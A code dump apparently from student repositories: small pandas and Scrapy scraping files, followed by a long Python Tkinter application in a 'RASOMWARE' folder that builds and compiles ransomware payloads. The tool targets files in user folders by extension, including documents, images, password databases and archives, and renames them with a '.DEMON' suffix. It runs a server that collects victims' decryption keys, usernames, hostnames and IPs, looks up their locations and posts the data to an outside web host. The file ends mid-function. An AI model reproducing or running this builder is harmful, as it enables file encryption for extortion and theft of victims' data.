mayor_precio = resultado.iloc[resultado['Precio normal'].idxmax()]
print("ITEM CON MAYOR PRECIO NORMAL:")
print(mayor_precio)
menor_precio = resultado.iloc[resultado['Precio normal'].idxmin()]
print("ITEM CON MENOR PRECIO NORMAL:")
print(menor_precio)
# cuanto ahorramos si compramos todo como afiliado
ahorrado = resultado.sum()
print("AL COMPRAR COMO AFILIADO SE AHORRA:{}".format(ahorrado['Diferencia precios']))
```
#### File: item_fybeca/item_fybeca/items.py
```python
import scrapy
from scrapy.loader.processors import MapCompose
from scrapy.loader.processors import TakeFirst
def transformar_url_imagen(texto):
url_fybeca = 'https://www.fybeca.com'
cadena_text = '../..'
return texto.replace(cadena_text,url_fybeca)
class ProductoFybeca(scrapy.Item):
titulo = scrapy.Field()
imagen = scrapy.Field(
input_processor = MapCompose( # lista de funciones
transformar_url_imagen
),
output_processor = TakeFirst() # Obtiene una lista y con el takefirst solo se toma el primero
)
``` |
{
"source": "2020-A-Python-GR1/py-sarzosa-saquinga-carlos-eduardo",
"score": 3
} |
#### File: arania_basica/spiders/arania_ejemplo.py
```python
import scrapy
class IntroSpider(scrapy.Spider):
name = 'introduccion_spider'
urls = [
'http://books.toscrape.com/catalogue/category/books/travel_2/index.html'
]
def start_requests(self):
for url in self.urls:
yield scrapy.Request(url=url)
def parse(self, response):
etiqueta_contenedora = response.css(
'article.product_pod'
)
titulos = etiqueta_contenedora.css(
'h3 > a::text'
).extract()
print(titulos)
```
#### File: RASOMWARE/CODIGO/main.py
```python
import os, sys, subprocess, threading, time, datetime, socket, select, webbrowser, base64, platform, base64, requests, hashlib
from tkinter import *
from tkinter.ttk import *
from ttkthemes import ThemedStyle
from tkinter import messagebox
from tkinter.filedialog import askopenfilename
from tkinter.filedialog import askdirectory
if platform.system() == 'Linux':
from PIL import Image, ImageTk
else:
import PIL.Image, PIL.ImageTk
from src.create_demon import *
from src.create_decrypt import *
try:
from Crypto import Random
from Crypto.Cipher import AES
from pymsgbox import *
except ImportError as e:
print('ERROR - Failed to import some modules.\n%s' % e)
pass
try:
import pyaes
except ImportError:
print('ERROR - Failed to import some modules.\n%s' % e)
def resource_path(relative_path):
if hasattr(sys, '_MEIPASS'):
return os.path.join(sys._MEIPASS, relative_path)
return os.path.join(os.path.abspath("."), relative_path)
def dec_key():
key = password(text='Por favor ingrese su clave de descifrado', title='Ingresar Clave', mask ='*')
if key == None or key == '':
messagebox.showwarning('Error', 'Sin Clave. Cancelado...')
return False
return key
def dec_path():
path = askdirectory(title = 'Seleccionar el directorio con archivos para descifrar')
if path == None or path == '':
messagebox.showwarning('Error', 'Ninguna ruta seleccionada, saliendo...')
return False
path = path + '/'
return path
def pad(s):
return s + b"\0" * (AES.block_size - len(s) % AES.block_size)
def decrypt(ciphertext, key):
iv = ciphertext[:AES.block_size]
cipher = AES.new(key, AES.MODE_CBC, iv)
plaintext = cipher.decrypt(ciphertext[AES.block_size:])
return plaintext.rstrip(b"\0")
def decrypt_file(file_name, key):
with open(file_name, 'rb') as f:
ciphertext = f.read()
dec = decrypt(ciphertext, key)
with open(file_name[:-6], 'wb') as f:
f.write(dec)
def decrypt_file_pyaes(file_name, key):
aes = pyaes.AESModeOfOperationCTR(key)
with open(file_name, 'rb') as fo:
plaintext = fo.read()
dec = aes.decrypt(plaintext)
with open(file_name[:-6], 'wb') as fo:
fo.write(dec)
def rename_file(file_name):
os.rename(file_name, file_name[:-6])
class MainWindow(Tk):
def __init__(self):
Tk.__init__(self)
self.title(string = "Proyecto Bimestral Python") # Set window title
self.resizable(0,0) # Do not allow to be resized
self.ttkStyle = ThemedStyle()
self.ttkStyle.set_theme("ubuntu")
# Top menu
menu = Menu(self)
self.config(background = 'white', menu=menu)
# Input field data is being inserted in this dict
self.options = {
'agreed' : IntVar(),
'host' : StringVar(),
'port' : IntVar(),
'save_keys' : IntVar(),
'remote' : StringVar(),
'local' : StringVar(),
'platform' : StringVar(),
'key' : StringVar(),
'os' : StringVar(),
'full_screen_var' : IntVar(),
'mode' : IntVar(),
'demo' : IntVar(),
'type' : StringVar(),
'method' : StringVar(),
'icon_path' : StringVar(),
'payload_path' : StringVar(),
'decryptor_path' : StringVar(),
'msg' : StringVar(),
'new_msg' : StringVar(),
'img_base64' : StringVar(),
'debug' : IntVar(),
'ext' : StringVar(),
'target_ext' : StringVar(),
'new_target_ext' : StringVar(),
'target_dirs' : StringVar(),
'new_target_dirs' : StringVar(),
'working_dir' : StringVar(),
'new_working_dir' : StringVar(),
'remove_payload' : IntVar(),
'runas' : IntVar(),
'inf_counter' : IntVar(),
}
self.options['agreed'].set(1)
#<activate>
if not self.options['agreed'].get() == 1:
self.show_license()
# Load profile
self.options['inf_counter'].set(0)
# Default Settings
self.options['host'].set('127.0.0.1')
self.options['port'].set(8989)
self.options['save_keys'].set(0)
self.options['full_screen_var'].set(0)
self.options['mode'].set(1)
self.options['demo'].set(0)
self.options['type'].set('pycrypto')
self.options['method'].set('override')
self.options['debug'].set(0)
self.options['ext'].set('.DEMON')
self.options['remove_payload'].set(0)
self.options['runas'].set(0)
self.options['working_dir'].set('$HOME')
self.options['target_dirs'].set('''Downloads
Documents
Pictures
Music
Desktop
Onedrive''')
self.options['target_ext'].set('''txt
ppt
pptx
doc
docx
gif
jpg
png
ico
mp3
ogg
csv
xls
exe
pdf
ods
odt
kdbx
kdb
mp4
flv
iso
zip
tar
tar.gz
rar''')
self.options['msg'].set('''PROYECTO PYTHON SEMESTRE 2020-A''')
self.options['img_base64'].set('''iVBORw0KGgoAAAANSUhEUgAAAlgAAAIOCAMAAABTb4MEAAAAY1BMVEVHcEy/v79/f39QUFBAQEAg
ICAAAAAQEBCfn5/f39/<KEY>''')
self.bind("<Escape>", self.exit_event) # Press ESC to quit app
if platform.system() == 'Linux':
photo = Image.open(resource_path('images/logo2.png'))
resized = photo.resize((150,150), Image.ANTIALIAS)
photo = ImageTk.PhotoImage(resized)
else:
photo = PIL.Image.open(resource_path('images/logo2.png'))
resized = photo.resize((150,150), PIL.Image.ANTIALIAS)
photo = PIL.ImageTk.PhotoImage(resized)
label = Label(self, image=photo, background = 'white')
label.image = photo # keep a reference!
label.grid(row = 0, column = 0, columnspan = 3, rowspan = 4)
Label(self, text = 'Proyecto Python', background = 'white', foreground = 'red', font='Helvetica 32 bold').grid(row = 2, column = 3, columnspan = 3)
# Buttons
generate_demon = Button(self, text = "GENERAR PAYLOAD", command = self.generate, width = 53).grid(row = 4, column = 0, columnspan = 6)
compile = Button(self, text = "COMPILAR PAYLOAD", command = self.compile, width = 53).grid(row = 5, column = 0, columnspan = 6)
start_server = Button(self, text="CAPTURADOR DE CLAVES", command=self.open_server, width=53).grid(row= 6,column=0,columnspan=6)
decrypt = Button(self, text = "DESENCRIPTAR ARCHIVOS", command = self.decrypt_files, width = 53).grid(row = 7, column = 0, columnspan = 6)
exit = Button(self, text = "SALIR", command = self.exit, width = 53).grid(row = 8, column = 0, columnspan = 6)
def exploit_options(self):
self.exp = Toplevel()
self.exp.title(string = 'Exploit Options')
self.exp.configure(background = 'white')
self.exp.resizable(0,0)
self.bind("<Escape>", self.close_exploit) # Press ESC to quit app
Label(self.exp, text = 'Spoof extention', background = 'white').grid(row = 0, column = 0)
def open_server(self):
self.set = Toplevel()
self.set.title(string = 'Settings')
self.set.configure(background = 'white')
self.set.resizable(0,0)
Label(self.set, text = 'Host', background = 'white').grid(row = 1, column = 0, sticky = 'w')
host = Entry(self.set, textvariable = self.options['host'], width = 30)
host.grid(row = 2, column = 0, columnspan = 2)
host.focus()
Label(self.set, text = 'Port', background = 'white').grid(row = 3, column = 0, sticky = 'w')
port = Entry(self.set, textvariable = self.options['port'], width = 30)
port.grid(row = 4, column = 0, columnspan = 2)
#Checkbutton(self.set, text = "Save keys to Onion Portal account", variable = self.options['save_keys'], onvalue = 1, offvalue = 0).grid(row = 5, column = 0, columnspan = 2, sticky = 'w')
if host == None or host == '':
messagebox.showwarning('ERROR', 'Invalid host!')
elif port == None or port == '':
messagebox.showwarning('ERROR', 'Invalid port!')
else:
self.options['host'] == host
self.options['port'] == port
go = Button(self.set, text = 'OK', command = self.run_server, width = 30)
go.grid(row = 7, column = 0, columnspan = 2)
self.set.bind('<Return>', self.set.destroy)
exit = Button(self.set, text = 'CANCELAR', command = self.set.destroy, width = 30).grid(row = 8, column = 0, columnspan = 2)
def run_server(self):
self.set.destroy()
self.serv = Toplevel()
self.serv.title(string = 'Capturador de Claves - Servidor')
self.serv.configure(background = 'white')
self.serv.resizable(0,0)
self.serv.protocol("WM_DELETE_WINDOW", self.close_server_by_click)
self.serv.bind("<Escape>", self.close_server) # Press ESC to close window
# Input field data is being inserted in this dict
self.serv.options = {
'host' : StringVar(),
'port' : IntVar(),
'remote' : StringVar(),
'local' : StringVar(),
'platform' : StringVar(),
'key' : StringVar(),
'mac' : IntVar(),
'linux' : IntVar(),
'other' : IntVar(),
}
# Canvas for image
canvas = Canvas(self.serv, highlightthickness=0, height = 150, width = 500, background = 'white')
canvas.grid(row=0, column=0, columnspan = 4)
#photo = PIL.ImageTk.PhotoImage(PIL.Image.open(BytesIO(base64.b64decode(photo_code))))
if platform.system() == 'Linux':
photo1 = Image.open(resource_path('images/windows.png'))
resized = photo1.resize((100,100), Image.ANTIALIAS)
photo1 = ImageTk.PhotoImage(resized)
else:
photo1 = PIL.Image.open(resource_path('images/windows.png'))
resized = photo1.resize((100,100), PIL.Image.ANTIALIAS)
photo1 = PIL.ImageTk.PhotoImage(resized)
if platform.system() == 'Linux':
photo2 = Image.open(resource_path('images/mac.png'))
resized = photo2.resize((100,100), Image.ANTIALIAS)
photo2 = ImageTk.PhotoImage(resized)
else:
photo2 = PIL.Image.open(resource_path('images/mac.png'))
resized = photo2.resize((100,100), PIL.Image.ANTIALIAS)
photo2 = PIL.ImageTk.PhotoImage(resized)
if platform.system() == 'Linux':
photo3 = Image.open(resource_path('images/linux.png'))
resized = photo3.resize((100,100), Image.ANTIALIAS)
photo3 = ImageTk.PhotoImage(resized)
else:
photo3 = PIL.Image.open(resource_path('images/linux.png'))
resized = photo3.resize((100,100), PIL.Image.ANTIALIAS)
photo3 = PIL.ImageTk.PhotoImage(resized)
if platform.system() == 'Linux':
photo4 = Image.open(resource_path('images/other.png'))
resized = photo4.resize((100,100), Image.ANTIALIAS)
photo4 = ImageTk.PhotoImage(resized)
else:
photo4 = PIL.Image.open(resource_path('images/other.png'))
resized = photo4.resize((100,100), PIL.Image.ANTIALIAS)
photo4 = PIL.ImageTk.PhotoImage(resized)
label = Label(self.serv, image=photo1, background = 'white')
label.image = photo1 # keep a reference!
label.grid(row = 0, column = 0)
label2 = Label(self.serv, image=photo2, background = 'white')
label2.image = photo2 # keep a reference!
label2.grid(row = 0, column = 1)
label3 = Label(self.serv, image=photo3, background = 'white')
label3.image = photo3 # keep a reference!
label3.grid(row = 0, column = 2)
label4 = Label(self.serv, image=photo4, background = 'white')
label4.image = photo4 # keep a reference!
label4.grid(row = 0, column = 3)
self.serv.options['win'] = Label(self.serv, text = 0, background = 'white', foreground = 'red', font='Helvetica 16 bold')
self.serv.options['win'].grid(row = 1, column = 0, columnspan = 1)
self.serv.options['mac'] = Label(self.serv, text = 0, background = 'white', foreground = 'red', font='Helvetica 16 bold')
self.serv.options['mac'].grid(row = 1, column = 1, columnspan = 1)
self.serv.options['linux'] = Label(self.serv, text = 0, background = 'white', foreground = 'red', font='Helvetica 16 bold')
self.serv.options['linux'].grid(row = 1, column = 2, columnspan = 1)
self.serv.options['other'] = Label(self.serv, text = 0, background = 'white', foreground = 'red', font='Helvetica 16 bold')
self.serv.options['other'].grid(row = 1, column = 3, columnspan = 1)
# Log Frame
result = LabelFrame(self.serv, text = 'Log', relief = GROOVE)
result.grid(row = 2, column = 0, rowspan = 4, columnspan = 5)
self.serv.options['log'] = Text(result, foreground="white", background="black", highlightcolor="white", highlightbackground="black", height = 35, width = 120)
self.serv.options['log'].grid(row = 0, column = 1)
scroll = Scrollbar(self.serv, command=self.serv.options['log'].yview)
scroll.grid(row=1, column=5, sticky='nsew')
self.serv.options['log']['yscrollcommand'] = scroll.set
# Tags
self.serv.options['log'].tag_configure('yellow', foreground='yellow')
self.serv.options['log'].tag_configure('red', foreground='red')
self.serv.options['log'].tag_configure('deeppink', foreground='deeppink')
self.serv.options['log'].tag_configure('orange', foreground='orange')
self.serv.options['log'].tag_configure('green', foreground='green')
self.serv.options['log'].tag_configure('bold', font='bold')
self.start_thread()
def export_data(self):
pass
def compile(self):
self.comp = Toplevel()
self.comp.title(string = 'Compilar Payload')
self.comp.configure(background = 'white')
self.comp.resizable(0,0)
self.comp.bind("<Escape>", self.close_compile) # Press ESC to close window
if os.path.isfile('./payload.py'):
self.options['payload_path'].set('./payload.py')
if os.path.isfile('./decryptor.py'):
self.options['decryptor_path'].set('./decryptor.py')
msg = LabelFrame(self.comp, text = 'Message', relief = GROOVE)
msg.grid(row = 0, column = 0, columnspan = 3, sticky = 'w')
Label(msg, text = 'Parece que estas ejecutando %s.\nSolo puede compilar en el sistema operativo que se esta ejecutando.' % platform.system(), background = 'white', font='Helvetica 16').grid(row = 0, column = 0)
os_frame = LabelFrame(self.comp, text = 'OS')
os_frame.grid(row = 1, column = 0)
win = Radiobutton(os_frame, text = 'Windows', variable = self.options['os'], value = 'windows')
win.grid(row = 0, column = 0, sticky = 'w')
mac = Radiobutton(os_frame, text = 'MacOS', variable = self.options['os'], value = 'mac')
mac.grid(row = 1, column = 0, sticky = 'w')
lin = Radiobutton(os_frame, text = 'Linux', variable = self.options['os'], value = 'linux')
lin.grid(row = 2, column = 0, sticky = 'w')
sett_frame = LabelFrame(self.comp, text = 'Opciones')
sett_frame.grid(row = 1, column = 1, columnspan = 2)
Entry(sett_frame, textvariable = self.options['icon_path'], width = 50).grid(row = 0, column = 0)
set_ico = Button(sett_frame, text = "SELECCIONAR ICONO", command = self.select_icon, width = 15).grid(row = 0, column = 1)
Entry(sett_frame, textvariable = self.options['payload_path'], width = 50).grid(row = 1, column = 0)
set_payload = Button(sett_frame, text = "SELECCIONAR PAYLOAD", command = self.select_payload, width = 15).grid(row = 1, column = 1)
Entry(sett_frame, textvariable = self.options['decryptor_path'], width = 50).grid(row = 2, column = 0)
set_decryptor = Button(sett_frame, text = "SELECCIONAR DESCIFRADOR", command = self.select_decryptor, width = 15).grid(row = 2, column = 1)
opt_frame = LabelFrame(self.comp, text = 'Finalizar')
opt_frame.grid(row = 2, column = 0, columnspan = 2)
finish = Button(opt_frame, text = "COMPILAR", command = self.compile_payload, width = 45).grid(row = 0, column = 0)
if platform.system() == 'Windows':
self.options['os'].set('windows')
mac.config(state = DISABLED)
lin.config(state = DISABLED)
elif platform.system() == 'Darwin':
self.options['os'].set('mac')
win.config(state = DISABLED)
lin.config(state = DISABLED)
elif platform.system() == 'Linux':
self.options['os'].set('linux')
win.config(state = DISABLED)
mac.config(state = DISABLED)
def compile_payload(self):
icon = False
try:
payload = open(self.options['payload_path'].get()).read()
except FileNotFoundError:
return messagebox.showerror('ERROR', 'File does not exist, check payload path!')
if not self.options['icon_path'].get() == '':
if not os.path.isfile(self.options['icon_path'].get()):
return messagebox.showwarning('ERROR', 'Icon File Not Found!')
else:
icon = True
if not os.path.isfile(self.options['payload_path'].get()):
return messagebox.showwarning('ERROR', 'Payload Not Found!')
try:
if self.options['os'].get() == 'windows':
py = 'pyinstaller.exe'
else:
py = 'pyinstaller'
if not 'from tkinter.ttk import' in payload:
tk = ''
else:
tk = '--hidden-import tkinter --hiddenimport tkinter.ttk --hidden-import io'
if not 'from Crypto import Random' in payload:
crypto = ''
else:
crypto = '--hidden-import pycryptodome'
if not 'import pyaes' in payload:
pyaes = ''
else:
pyaes = '--hidden-import pyaes'
if icon == True:
os.system('%s -F -w -i %s %s %s %s %s' % (py, self.options['icon_path'].get(), tk, crypto, pyaes, self.options['payload_path'].get()))
else:
os.system('%s -F -w %s %s %s %s' % (py, tk, crypto, pyaes, self.options['payload_path'].get()))
if os.path.isfile('./decryptor.py'):
ask = messagebox.askyesno('Found decryptor!', 'Compilar Desencriptador ahora?')
if ask == False:
messagebox.showinfo('SUCCESS', 'Payload Compilado Exitosamente')
self.comp.destroy()
elif ask == True:
self.compile_decrypt()
else:
return messagebox.showinfo('SUCCESS', 'Payload Compilado Exitosamente')
except Exception as e:
messagebox.showwarning('ERROR', 'Failed to compile!\n\n%s' % e)
def compile_decrypt(self):
try:
decrypt = open(self.options['decryptor_path'].get()).read()
except FileNotFoundError:
return messagebox.showerror('ERROR', 'File does not exist, check decryptor path!')
try:
if self.options['os'].get() == 'windows':
py = 'pyinstaller.exe'
else:
py = 'pyinstaller'
if not 'from tkinter.ttk import' in decrypt:
tk = ''
else:
tk = '--hidden-import tkinter --hiddenimport tkinter.ttk --hidden-import io'
if not 'from Crypto import Random' in decrypt:
crypto = ''
else:
crypto = '--hidden-import pycryptodome'
if not 'import pyaes' in decrypt:
pyaes = ''
else:
pyaes = '--hidden-import pyaes'
if not 'from pymsgbox':
pymsg = ''
else:
pymsg = '--hidden-import pymsgbox'
os.system('%s -F -w %s %s %s %s %s' % (py, tk, crypto, pyaes, pymsg, self.options['decryptor_path'].get()))
messagebox.showinfo('SUCCESS', 'Payload Compilado Exitosamente')
self.comp.destroy()
except Exception as e:
messagebox.showwarning('ERROR', 'Failed to compile!\n\n%s' % e)
def select_icon(self):
self.options['icon_path'].set(askopenfilename(initialdir = "./", title = 'Select Icon...', filetypes = (('Icon Files', '*.ico'), ('All Files', '*.*'))))
def select_payload(self):
self.options['payload_path'].set(askopenfilename(initialdir = "./", title = 'Select Payload...', filetypes = (('Python Files', '*.py'), ('All Files', '*.*'))))
def select_decryptor(self):
self.options['decryptor_path'].set(askopenfilename(initialdir = "./", title = 'Select Decryptor...', filetypes = (('Python Files', '*.py'), ('All Files', '*.*'))))
def generate(self):
self.gen = Toplevel()
self.gen.title(string = 'Generar Payload')
self.gen.configure(background = 'white')
self.gen.resizable(0,0)
self.gen.bind("<Escape>", self.close_generate) # Press ESC to close window
mode_frame = LabelFrame(self.gen, text = 'Modo')
mode_frame.grid(row = 0, column = 0, sticky = 'nw')
Radiobutton(mode_frame, text = 'GUI', variable = self.options['mode'], value = 1).grid(row = 0, column = 0, sticky = 'w')
Radiobutton(mode_frame, text = 'Consola', variable = self.options['mode'], value = 2, command = self.check_settings).grid(row = 1, column = 0, sticky = 'w')
Checkbutton(mode_frame, text = "Fullscreen", variable = self.options['full_screen_var'], command = self.check_settings, onvalue = 1, offvalue = 0).grid(row = 0, column = 1, sticky = 'w')
server_frame = LabelFrame(self.gen, text = 'Servidor Remoto')
server_frame.grid(row = 0, column = 1, sticky = 'nw')
Label(server_frame, text = 'Host:').grid(row = 0, column = 0, sticky = 'w')
Entry(server_frame, textvariable = self.options['host'], width = 20).grid(row = 0, column = 1)
Label(server_frame, text = 'Port:').grid(row = 1, column = 0, sticky = 'w')
Entry(server_frame, textvariable = self.options['port'], width = 20).grid(row = 1, column = 1)
enc_frame = LabelFrame(self.gen, text = 'Tipo de Encriptación')
enc_frame.grid(row = 0, column = 2, sticky = 'w')
Radiobutton(enc_frame, text = 'PyCrypto (Fast)', variable = self.options['type'], value = 'pycrypto').grid(row = 0, column = 0, sticky = 'w')
Radiobutton(enc_frame, text = 'PyAES (Slow)', variable = self.options['type'], value = 'pyaes').grid(row = 1, column = 0, sticky = 'w')
content_frame = LabelFrame(self.gen, text = 'Contenido')
content_frame.grid(row = 1, column = 0, sticky = 'nw')
set_dirs = Button(content_frame, text = 'Directorios', command = self.set_dirs, width = 25).grid(row = 0, column = 0)
set_msg = Button(content_frame, text = 'Mensaje', command = self.set_msg, width = 25).grid(row = 1, column = 0)
set_img = Button(content_frame, text = 'Imagen', command = self.set_img, width = 25).grid(row = 2, column = 0)
set_ext = Button(content_frame, text = 'Extensiones', command = self.set_ext, width = 25).grid(row = 3, column = 0)
options_frame = LabelFrame(self.gen, text = 'Opciones')
options_frame.grid(row = 0, column = 3, sticky = 'nw')
Checkbutton(options_frame, text = 'Demo', variable = self.options['demo'], command = self.check_settings, onvalue = 1, offvalue = 0).grid(row = 0, column = 0, sticky = 'w')
Checkbutton(options_frame, text = 'Debug', variable = self.options['debug'], onvalue = 1, offvalue = 0).grid(row = 1, column = 0, sticky = 'w')
Checkbutton(options_frame, text = 'Admin', variable = self.options['runas'], onvalue = 1, offvalue = 0).grid(row = 2, column = 0, sticky = 'w')
meth_frame = LabelFrame(self.gen, text = 'Método de Encriptación')
meth_frame.grid(row = 1, column = 1, sticky = 'w')
Radiobutton(meth_frame, text = 'Sobrescribir y Renombrar', variable = self.options['method'], value = 'override').grid(row = 0, column = 0, sticky = 'w')
Radiobutton(meth_frame, text = 'Copiar y Eliminar', variable = self.options['method'], value = 'copy').grid(row = 1, column = 0, sticky = 'w')
finish_frame = LabelFrame(self.gen, text = 'Finalizar')
finish_frame.grid(row = 1, column = 2, columnspan = 1, sticky = 'w')
generate = Button(finish_frame, text = "Generar", command = self.make_demon, width = 25).grid(row = 0, column = 0)
def set_img(self):
try:
f = base64.b64encode(open(askopenfilename(initialdir = "./", title = 'Select Image...', filetypes = ([('Image Files', '*.png *.jpg')])), 'rb').read()).decode('utf-8')
except FileNotFoundError:
return
self.options['img_base64'].set(f)
def set_msg(self):
self.message = Toplevel()
self.message.title(string = 'Set Custom Message')
self.message.configure(background = 'white')
self.message.resizable(0,0)
self.message.bind("<Escape>", self.close_set_msg)
self.options['new_msg'] = Text(self.message, height = 25, width = 100)
self.options['new_msg'].grid(row = 0, column = 0)
save = Button(self.message, text = 'SAVE', command = self.change_msg, width = 50).grid(row = 1, column = 0)
self.options['new_msg'].insert(END, self.options['msg'].get())
self.options['new_msg'].focus()
def change_msg(self):
self.options['msg'].set(self.options['new_msg'].get('1.0', END))
self.message.destroy()
def set_ext(self):
self.extentions = Toplevel()
self.extentions.title(string = 'Set File Extentions')
self.extentions.configure(background = 'white')
self.extentions.resizable(0,0)
self.extentions.bind("<Escape>", self.close_set_target_ext)
self.options['new_target_ext'] = Text(self.extentions, height = 15, width = 25)
self.options['new_target_ext'].grid(row = 0, column = 0)
scrollb = Scrollbar(self.extentions, command=self.options['new_target_ext'].yview)
scrollb.grid(row=0, column=1, sticky='nsew')
self.options['new_target_ext']['yscrollcommand'] = scrollb.set
save = Button(self.extentions, text = 'SAVE', command = self.change_target_ext, width = 15).grid(row = 1, column = 0)
self.options['new_target_ext'].insert(END, self.options['target_ext'].get())
self.options['new_target_ext'].focus()
def change_target_ext(self):
self.options['target_ext'].set(self.options['new_target_ext'].get('1.0', END))
self.extentions.destroy()
def set_dirs(self):
self.dirs = Toplevel()
self.dirs.title(string = 'Definir Directorios')
self.dirs.configure(background = 'white')
self.dirs.resizable(0,0)
self.dirs.bind("<Escape>", self.close_set_target_dirs)
Label(self.dirs, text = 'Root', background = 'white').grid(row = 0, column = 0, sticky = 'w')
self.options['new_working_dir'] = Entry(self.dirs, width = 30)
self.options['new_working_dir'].grid(row = 1, column = 0, sticky = 'n')
Label(self.dirs, text = 'Directorios', background = 'white').grid(row = 2, column = 0, sticky = 'w')
self.options['new_target_dirs'] = Text(self.dirs, height = 10, width = 40)
self.options['new_target_dirs'].grid(row = 3, column = 0)
save = Button(self.dirs, text = 'Guardar', command = self.change_target_dirs, width = 15).grid(row = 4, column = 0)
self.options['new_working_dir'].insert(END, self.options['working_dir'].get())
self.options['new_target_dirs'].insert(END, self.options['target_dirs'].get())
self.options['new_working_dir'].focus()
def change_target_dirs(self):
self.options['working_dir'].set(self.options['new_working_dir'].get())
self.options['target_dirs'].set(self.options['new_target_dirs'].get('1.0', END))
self.dirs.destroy()
def check_settings(self):
if self.options['mode'].get() == 2:
self.options['full_screen_var'].set(0)
def make_demon(self):
try:
create_demon(self.options['host'].get(),
self.options['port'].get(),
self.options['full_screen_var'].get(),
self.options['demo'].get(),
self.options['type'].get(),
self.options['method'].get(),
self.options['msg'].get(),
self.options['img_base64'].get(),
self.options['mode'].get(),
self.options['debug'].get(),
self.options['target_ext'].get(),
self.options['target_dirs'].get(),
self.options['remove_payload'].get(),
self.options['working_dir'].get(),
self.options['runas'].get())
except Exception as e:
messagebox.showwarning('ERROR', 'Failed to generate payload!\n\n%s' % e)
return
try:
create_decrypt(self.options['type'].get())
messagebox.showinfo('SUCCESS', 'Payload y Descifrador generados exitosamente.')
except Exception as e:
messagebox.showwarning('ERROR', 'Failed to generate decryptor!\n\n%s' % e)
self.gen.destroy()
def decrypt_files(self):
ask = confirm(text='Selecciona un Método de Desenciptación', buttons=['PyCrypto', 'PyAES'])
if ask == "I don't know":
messagebox.showinfo('Encryption type detection', 'Comming Soon!\n\nIf you really dont know, test it on one file first.')
return
if ask == 'Ghost':
pass
else:
key = dec_key()
key = key.encode('utf-8')
if key == False:
return
p = dec_path()
if p == False:
return
a = messagebox.askokcancel('ALERTA', 'Esta herramienta descifrará sus archivos con la clave dada.\n\nSin embargo, si su clave o método no es correcto, sus archivos (encriptados) serán dañados\n\n ¡Es posible que desee hacer una copia de seguridad!')
if a == True:
pass
else:
return
try:
counter = 0
for path, subdirs, files in os.walk(p):
for name in files:
if name.endswith(".DEMON"):
if ask == 'PyCrypto':
decrypt_file(os.path.join(path, name), key)
os.remove(os.path.join(path, name))
print("[Decrypted] %s" % name)
counter+=1
elif ask == 'PyAES':
print("[Decrypting] %s" % name)
decrypt_file_pyaes(os.path.join(path, name), key)
os.remove(os.path.join(path, name))
counter+=1
elif ask == 'Ghost':
rename_file(os.path.join(path, name))
print("[RENAMED] %s" % name)
counter+=1
elif name == 'README.txt':
os.remove(os.path.join(path, name))
print('[DELETED] %s/%s' % (path, name))
else:
print("[Skipped] %s" % name)
print("\n[DONE] Decrypted %i files" % counter)
except KeyboardInterrupt:
print("\nInterrupted!\n")
sys.exit(0)
except Exception as e:
print("\n[ ERROR ] %s" % e)
sys.exit(1)
def start_thread(self):
# Start server as thread
thread = threading.Thread(target=self.start_server, daemon = True)
thread.start()
def start_server(self):
host = self.options['host'].get()
port = self.options['port'].get()
save_keys = self.options['save_keys'].get()
socket_list = []
self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server_socket.bind((host, port))
self.server_socket.listen(10)
self.insert_banner()
self.serv.options['log'].insert('1.0', "Servidor Iniciado en [%s] [%s]\nEsperando...\n" % (host, int(port)), 'deeppink')
try:
while True:
sockfd, addr = self.server_socket.accept()
try:
while True:
data = sockfd.recv(1024)
if data:
data = data.decode('UTF-8')
ip = addr[0]
local = data.split('$')[0]
system = data.split('$')[1]
key = data.split('$')[2].strip()[2:].strip()[:-1]
user = data.split('$')[3]
hostname = data.split('$')[4]
if ip:
lookup = self.get_ip_data(ip)
con = lookup.split(',')[0]
country = lookup.split(',')[1]
region = lookup.split(',')[2]
city = lookup.split(',')[3]
isp = lookup.split(',')[4]
zip = lookup.split(',')[5]
lat = lookup.split(',')[6]
lon = lookup.split(',')[7]
result = '''
[Fecha] -> %s %s
[Username] -> %s
[OS] -> %s
[Hostname] -> %s
[Key] -> %s
[IP Remota] -> %s
[IP Local] -> %s
''' % (time.strftime('%d/%m/%Y'),
time.strftime('%X'),
user,
system,
hostname,
key,
ip,
local)
self.serv.options['log'].insert(END, result, 'yellow')
self.serv.options['log'].see(END)
if system == 'Windows':
co = self.serv.options['win']['text'] + 1
self.serv.options['win']['text'] = co
elif system == 'Darwin':
co = self.serv.options['mac']['text'] + 1
self.serv.options['mac']['text'] = co
elif system == 'Linux':
co = self.serv.options['linux']['text'] + 1
self.serv.options['linux']['text'] = co
else:
co = self.serv.options['other']['text'] + 1
self.serv.options['other']['text'] = co
#if save_keys == 1:
payload = {'user' : self.options['username'].get(), 'pwd' : self.options['password'].get(), 'Occured': time.strftime('%d/%m/%Y') + ' ' + time.strftime('%X'), 'Username' : user, 'OS' : system, 'Hostname' : hostname, 'Key' : key, 'IP' : ip, 'LocalIP' : local, 'Continent' : con, 'Country' : country, 'Region' : region, 'City' : city , 'ISP' : isp, 'ZIP' : zip, 'lat' : lat, 'lon' : lon}
r = requests.post('https://zeznzo.nl/post.py', data=payload)
else:
break
except Exception as e:
print(e)
finally:
sockfd.close()
except Exception as e:
pass
self.server_socket.close()
def close_server_by_click(self):
self.server_socket.close()
self.serv.destroy()
def insert_banner(self):
banner = '''
______ ______ _____ __ __ _____ _____ _____ _____
| ___ \| ___ \| _ |\ \ / /| ___|/ __ \|_ _|| _ |
| |_/ /| |_/ /| | | | \ V / | |__ | / \/ | | | | | |
| __/ | / | | | | \ / | __| | | | | | | | |
| | | |\ \ \ \_/ / | | | |___ | \__/\ | | \ \_/ /
\_| \_| \_| \___/ \_/ \____/ \____/ \_/ \___/
______ __ __ _____ _ _ _____ _ _
| ___ \\ \ / /|_ _|| | | || _ || \ | |
| |_/ / \ V / | | | |_| || | | || \| |
| __/ \ / | | | _ || | | || . ` |
| | | | | | | | | |\ \_/ /| |\ |
\_| \_/ \_/ \_| |_/ \___/ \_| \_/
'''
self.serv.options['log'].insert('1.0', banner + '\n', 'red')
def get_ip_data(self, ip):
url = 'http://ip-api.com/json/%s?fields=status,message,continent,continentCode,country,countryCode,region,regionName,city,district,zip,lat,lon,timezone,currency,isp,org,as,asname,reverse,mobile,proxy,query' % ip
try:
r = requests.get(url, timeout = 5)
except Exception as e:
con = 'Error - Fail'
country = 'Error - Fail'
region = 'Error - Fail'
city = 'Error - Fail'
isp = 'Error - Fail'
zip = 'Error - Fail'
lat = 'Error - Fail'
lon = 'Error - Fail'
return '%s,%s,%s,%s,%s,%s,%s,%s' % (con, country, region, city, isp, zip, lat, lon)
data = r.json()
if r.status_code == 200 and data['status'] == 'success':
